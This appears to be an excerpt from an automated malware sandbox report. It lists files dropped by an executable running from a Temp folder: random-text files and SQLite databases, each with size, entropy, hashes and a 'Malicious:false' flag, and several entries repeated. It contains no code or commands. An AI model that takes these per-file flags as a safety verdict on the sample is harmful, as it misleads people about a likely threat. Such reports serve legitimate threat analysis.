                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.698711683401115
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
                                                                                                                                                                                                                                            MD5:47643CE7571E0C995094D7CE5F2005D7
                                                                                                                                                                                                                                            SHA1:40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
                                                                                                                                                                                                                                            SHA-256:1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
                                                                                                                                                                                                                                            SHA-512:3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:HMPPSXQPQVZTKYGXRLZXZQHGCZSWFSMKAZTFZQVPBWYDEIQOYRZBKZROCVLLNDGOXMZATHCHJWBWCKMDMUVOMUCFYNBSIKMCOOAGLUHDSCAREEEQGTRYCAFLTFVCHREFHJJALACUPWFTGZJJVRRQBVOZGXIEUBTJBNHNAXRWAWTUYQZIZWPARDBZBFGZUBQQPINOCLFOLDPTMWQVUUBDSNGDFVMEOTHPNKBOMDPGLFXUXBXHUOTYRPUQTUJPKLUSNTISPNFAHVFBBWEWJQFBJFCDDWUUKCQJNEKMUTJEZKKMXXOCBOVMCGGYTPDYBYYFVGHQJJBCDHYWPXJUJWPNURQCUHPTATLFRAOGUCJWWSBAITHVPDRYRFCTPIWHJVKSAXOIPKHISTBCDZISGIVPPYDJLJWFRNVNCWIOINKYQLAFVLCPSGCZABGNTUVGEDQZGQNDECUBPLLOYUYTHXDNNCAXKLHFZXBBAWBICFREGZBLZZMPWRLUSXUNEXAKLSJETGNCJTTGSNPPSHZUKZDHHYHBBWKJUSIBAKGKHQJINZHCWLBCIIUGTVVLNEZXUBIPUVRAILLENTRJYFNIBHNOUNYAIFQBNUMFUSXNGITFIFZKTSFAQXDYVBIUCIUYJIGJTIJHWTPPRJQVSBHHUXLZRPPJOWJAPSVQQVKLFHKXZRPEJBFXNKVNBCPMLRQGCJINKLLBJVROFAFCDRFCDAMIDEYSZDWNLUMJZXGWKOIKNAYVXPYRZWMBNAAFKFOPCVNGUECOARMDWJVYVUQQAFEGKCYXVVGXPHPEVOMRADTQDTJSHAKHPNNOGUDWBRXDJFEMSJTJUJKHZONBLGDCDDUDTRQKPOFACELSKHFSBPKXKDGWOKSDBAMWLKXEAOOHWVOAQZGZCNSDWOXSHPTFMVMYQXTRNMUPZSFQXOQLPUFJWHWTXXIRMQXDPVAJKHMSCGTFVJKECYILRMHGFBWQKUNTRVZTBJQJAKTSJUIDOLPL
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.698711683401115
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
                                                                                                                                                                                                                                            MD5:47643CE7571E0C995094D7CE5F2005D7
                                                                                                                                                                                                                                            SHA1:40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
                                                                                                                                                                                                                                            SHA-256:1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
                                                                                                                                                                                                                                            SHA-512:3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:HMPPSXQPQVZTKYGXRLZXZQHGCZSWFSMKAZTFZQVPBWYDEIQOYRZBKZROCVLLNDGOXMZATHCHJWBWCKMDMUVOMUCFYNBSIKMCOOAGLUHDSCAREEEQGTRYCAFLTFVCHREFHJJALACUPWFTGZJJVRRQBVOZGXIEUBTJBNHNAXRWAWTUYQZIZWPARDBZBFGZUBQQPINOCLFOLDPTMWQVUUBDSNGDFVMEOTHPNKBOMDPGLFXUXBXHUOTYRPUQTUJPKLUSNTISPNFAHVFBBWEWJQFBJFCDDWUUKCQJNEKMUTJEZKKMXXOCBOVMCGGYTPDYBYYFVGHQJJBCDHYWPXJUJWPNURQCUHPTATLFRAOGUCJWWSBAITHVPDRYRFCTPIWHJVKSAXOIPKHISTBCDZISGIVPPYDJLJWFRNVNCWIOINKYQLAFVLCPSGCZABGNTUVGEDQZGQNDECUBPLLOYUYTHXDNNCAXKLHFZXBBAWBICFREGZBLZZMPWRLUSXUNEXAKLSJETGNCJTTGSNPPSHZUKZDHHYHBBWKJUSIBAKGKHQJINZHCWLBCIIUGTVVLNEZXUBIPUVRAILLENTRJYFNIBHNOUNYAIFQBNUMFUSXNGITFIFZKTSFAQXDYVBIUCIUYJIGJTIJHWTPPRJQVSBHHUXLZRPPJOWJAPSVQQVKLFHKXZRPEJBFXNKVNBCPMLRQGCJINKLLBJVROFAFCDRFCDAMIDEYSZDWNLUMJZXGWKOIKNAYVXPYRZWMBNAAFKFOPCVNGUECOARMDWJVYVUQQAFEGKCYXVVGXPHPEVOMRADTQDTJSHAKHPNNOGUDWBRXDJFEMSJTJUJKHZONBLGDCDDUDTRQKPOFACELSKHFSBPKXKDGWOKSDBAMWLKXEAOOHWVOAQZGZCNSDWOXSHPTFMVMYQXTRNMUPZSFQXOQLPUFJWHWTXXIRMQXDPVAJKHMSCGTFVJKECYILRMHGFBWQKUNTRVZTBJQJAKTSJUIDOLPL
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.697753460288242
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:HsRCds67IJTDT5xb12CyWTLAaR3BNw/tZn5D4O:HMCilxb12nzaBnwhf
                                                                                                                                                                                                                                            MD5:94DAFC1D85CD870A4F587F29D12C5756
                                                                                                                                                                                                                                            SHA1:D155E950DB7096969FA07355D359500B54E90DC8
                                                                                                                                                                                                                                            SHA-256:C6E8FE24E3E17241CF911B00E8A961F4CA84B1CAEDA78AFB9C11E3F40197F894
                                                                                                                                                                                                                                            SHA-512:70904F5C8153EDF02FFEF0571F8DE4A647C9DB215F1A7C65291B4C5910DE18E5E19838C4F94281555AC7CB33AC5D1F8A6E903225E0BD6827B033C042BC71AF0A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:IYEPUIQXSKCYAPPMDBBJFUFSVGKYORVMQYYHGYEZITIALMPHTPGBBGYJESZAUBKJMZYBPZMDMMAMHVSIOUYVASETHUAYUPPEQRULMXZBPMMNCBNBMDCFYRPNCXJRSPRYDRUCVCAUHINJWDCWAAHBDHSSRPZAWWETCFUJOTGDONNZWLLNGCDPIMOBBGUYLZZUZEHARHWZDUMCWRPKNYJTKZCGWKDMMERSKEFDQGVKWSAHDESUFIXARXNMNKGAEFLKZAHPLWNICTUFUGNCNTAZSWMYRXWUHOVNAJRNZNDFEODXAMPUOTLEIETHLRCJTDQRVOFYFWMULABJHVLIUYAPOYWYSEVCKUDZOXKRJAIVAQGAYSNIXBOAMMCTECZJNWDNFBTGDKMCHRZKROZZUGUPIWLRVPSHOETKQKHETUDGEEOVAHUDSPMZZKNOAZSFEXBGHWWEZDVJKUXCUJCJXUOBOHAFXWGIZNWNCRYNBBMPMDEEBVCUFSPNZNIUMYREXCTRWSXIYOTYKDSFRMVYHGABUSGSNQRAUQKHLDURPUDSNTOCLZDXLLHOBCHCJINUWKWHMBCPQIBNWPXZKXEDNYXPRXVUWBPJXVVTZNJWRCZZFIOYYUCFWDWAIPPXZQHMMWWEJGYNKLVTKFYZICCXWXHWQNOXGGLZIDJDRKTTKQJPTTPJYSIEDVJZIPLCKCPAXCZFBIHJYRJGBSQIFQLEOFAZBLNBCIPEJKVLFSIUYTRQYFCZDMKTYWSQXFHWQQFGOJFSTMKDJQSPQEYQBXSQHSHLEOPFFQXRINWZFRNWMRRMHAAFPLEQACJSACWYIZKPPJDMCHQNDFLZMESZOTIYKRJXKJBDFRDSUYFIFJFEMXQIEIXXGQITQPCQJXYVUBMITMTTTFTHMYAMEAEDVVLHNIIZSFRPHKQXGRHPPCPFQKILHFYGUPTPJWWLAJXDDTKYGMMUMLUQLMXEAWVWQMZREMNSLADFMMFSFYCOQTLARJET
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.695566741548326
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:61iSJC9lUfmxZoTgwj7WkGrivJpQ4t468phJvvHIm:6M/lU+x27HleIQ4t4bHIm
                                                                                                                                                                                                                                            MD5:CA699715DA51DFD5AB81CDA02AFD2CD7
                                                                                                                                                                                                                                            SHA1:72D44C17A04FAB316BEA20F61A80D7AC787879D4
                                                                                                                                                                                                                                            SHA-256:BA61F500E1845F2FC03C990DA95B7DD92ED8B7583744C941D37BDD90DA666D21
                                                                                                                                                                                                                                            SHA-512:497F9D6B6EE52454F4B740A6B765F46EBC10575E9A20B62D76594E1CC4E37868182D18315E05E62A78D5131A5569C95C8989F248E3A8C72BD95A99883DF196D2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:IZMFBFKMEBTITTFFYOGRJOKLUYKYEMJURKRTIEUFEDJKBQPELZNUOXWVNDZJRAOONFPZIJHBCSQXWTLQPDNPIJFFQZDETQFKNDQYRTMSHJIWQXJBNOXAVBJCARKFOKHIBUFVCEOHZTISPCFZSEFFASUHHMDHUBAMSDTGESWVKGUMZNYRLTUEBNLLDQOMZLGIFYUADUMCNGQHUWJKQAWHNDDSWUDEYOPPNFAUERMDDQUABWZCHPIWYDNDHUXDNYSLQSQXHUJRCQMGRZMRHEOVRBHVMIEIIBHEADKNABKWVMULXGOWXFOLUTZDUOKAMBBJKEPASVGVTDOUQMBCJGMPZZSAVFTSOBTVJPGYYQSJQWHRBFXNUHYKYXWZSTJELLKRMBHUVLFEPITLTURHTDAKMVDVNYWADPMNSQACTPRPTZDAYSYQHCRSDUXMKTYASRROVGGBBIXHTORYFNKLOIBCKWHWPTJGKEQOSVXTUUTFZVORIRTKYSUWDEDDGTJHWLZYRYCPYUENHHDNRWCVEAZUDOXSWLHJDIGSALQSCJKGZEXAIJUDAQHXCOAVPDFCQIEHQEFVSBLKSKPDHYCYSPHGVTEDVHAWYWOOWFAJSTOXLDYSHUWZIJQGRICKYUZPXLOZURIDFCEWXUMATNYLUVJTEOTDEYCCRPCVBPHMOLWESOWCICFDWLNMYIPCOLYFBDDSRCSOZZCSIWGDPTAXMSUSNBSGLDTYGEEBZGXKIVMAHAMBSJEUPRTVXERTMYQWIYUTCCWNXDLXQQSMSGHDXMIYKWUXJBHOCOBAEVHTWJOZVUWZIGVYBPSQGRQDABKLPWJJRURTHDJAMMOZSJFGCHHDVYXDYYIUIOZDZJWQLIKTEKOTISNTJFMZOMVLIYUHJEAMEKRMBWXHAYWZVDUJKHILQWXCRKUPFLJKIKWARBWYUOFDHFXEHJWSBCSSQMNJANADKJFCPMBCMQGQXNUCZETZWJFUFSMVAZQXHOGKPFDO
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):98304
                                                                                                                                                                                                                                            Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                                            Entropy (8bit):0.848598812124929
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                                                                                                                                                                                            MD5:9664DAA86F8917816B588C715D97BE07
                                                                                                                                                                                                                                            SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                                                                                                                                                                                            SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                                                                                                                                                                                            SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):196608
                                                                                                                                                                                                                                            Entropy (8bit):1.1215420383712111
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                                                                                                                                                                            MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                                                                                                                                                                                            SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                                                                                                                                                                                            SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                                                                                                                                                                                            SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):51200
                                                                                                                                                                                                                                            Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.698393795110914
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:weX7B5oYsT2B9e4Feb4OKL65JIiga/zOnv9iY81icgfiTetEc8E:FPoYsqB9e4dP63IigGOvo11LetEc8E
                                                                                                                                                                                                                                            MD5:7C5655873C22D2522B13B34841F82038
                                                                                                                                                                                                                                            SHA1:ED733AE5B3E813B97D69E7283AEB8085EFC62B78
                                                                                                                                                                                                                                            SHA-256:9A515FAA0EE108930EC0C597C9E2CA74B21C3C9D45F3F845954A65F3FA4C494D
                                                                                                                                                                                                                                            SHA-512:A98C25203B5A8C5C3FE7859E1B128BA3C0B5691BE716C53CA427770F10EC65CBB8B704EEA994BCE1ECA69EC4D46BCC0D48FE844653B964E96D1248D2E211CBD2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:LFOPODGVOHLLKBCXZQUOXPFEKGPKVDEYIZRZGQPAXXVWAHGTCBCWCYBHYOPHLEVYFLCEXNMVAAPUECIPRDZTIBJFGFXDAEMKYPYGCWSRTCUEEDISUDHVYQEPCSIKRBOXVZVTBFVUQHQYHEIWQPMZFNXNKGPPDGDMKJWAYJVYMRCYCWORBYPZYIFTAANBVDPJJOGYMYDPMPCNSOQVKLKNKHQVJQRYOOACYXVWFBJGOZRXUBDUSJEQNJXCVPHTUWAVCILOAXOWIJVWKMAIOEWTHGQELYIGVJJZNFBDSZXPZMLZNFDRIJQQQDSSMCBEMRHVOYIGRXSYQYDLBDBDJCVRREJGRUBPNYBFUCUXLMUIULULHCWJQQEMKBQMLJBDJQHFXPNODSTVZXWZZOXPIXKBRKMKOYEBDUBYOGMGXHFMCUIKRQYQMHGUBUAAFTMUCZNIIVAIOOBIASAJPKXIYIQIRVIIXGNUEDAXQJYWQXOBTAINKSTSHZGNUWVHVDUXVGWBWRXOYEGSIRNXRHBFOAWRQVFKAGDUSHRWQWJQRNMOGHTWFHOOZGRSVCSEJNMPDYUGTSBOMGHSHACUNTVVGKNAZSSLLQOXMCBVKFFAQLQCWYNIWPVJRECIKVCXZGCNHKXMQDPPOURAWIKZOZEFLDUYVIGDPGUMGOGBUYKGLVLWQSDAHAAIVFUNWQIWKRCSLCPMZBWBBDTBBVTZNYCLEIZNLQRHKBOLVTUTWSURDWQTCHAPUMJQWNVWVGFLAAPEHMLBUSYJCZDJUMZMKIOKIMVTYPMCXUXWVXIMVUCNXESHIVCKNFAALGDXCVJHQZWLDSAWNJWFBTHDBKGVKXLWDOPOOBJMPJCKUXVNFQVOUEIHJKOHTDCQCDOFQBMSQNWVDKTKWJIFVOMWEUJULPMGUSEWAZAHAZVGRSWNQYXPMKFWQGODZHVNOEXZBPLONONBPAHCDWEMSFLRJBFMOKMCLAGRJEGRTGVETXSZKDXQWEOD
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.69486718145169
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
                                                                                                                                                                                                                                            MD5:E63B196AE0D5F7670244FB1347D75EFC
                                                                                                                                                                                                                                            SHA1:1C17108AC7E5263674836BAD67AE44D8C3C6890B
                                                                                                                                                                                                                                            SHA-256:D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
                                                                                                                                                                                                                                            SHA-512:63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.69486718145169
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
                                                                                                                                                                                                                                            MD5:E63B196AE0D5F7670244FB1347D75EFC
                                                                                                                                                                                                                                            SHA1:1C17108AC7E5263674836BAD67AE44D8C3C6890B
                                                                                                                                                                                                                                            SHA-256:D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
                                                                                                                                                                                                                                            SHA-512:63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH
                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                                                            Entropy (8bit):1.0554331083046358
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:gDswrf4qo0L5hN0YxAjSXZrMZ29bzuiF+/Z24IO8pMX:gD/f4qDl705j7MbzuiFsY4IO8S
                                                                                                                                                                                                                                            MD5:C768AC9E0E28B52DBACC78208D6B6FF5
                                                                                                                                                                                                                                            SHA1:B774E7D0C7C5EF533B23EF9EE07D80ABAB3A3563
                                                                                                                                                                                                                                            SHA-256:1ABF1CF17537B39D7D2E2F88236505F45F61E8CF02BAF192B68BE149827BCDB5
                                                                                                                                                                                                                                            SHA-512:9AC0274058AB7F42221992952A83AF8CB833DBCF1CC70D5353AD85CD21109613B30C84AB7395C1AD71CF2ECCBABFCD4E0009439186596A42D28F27DAA1450F62
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
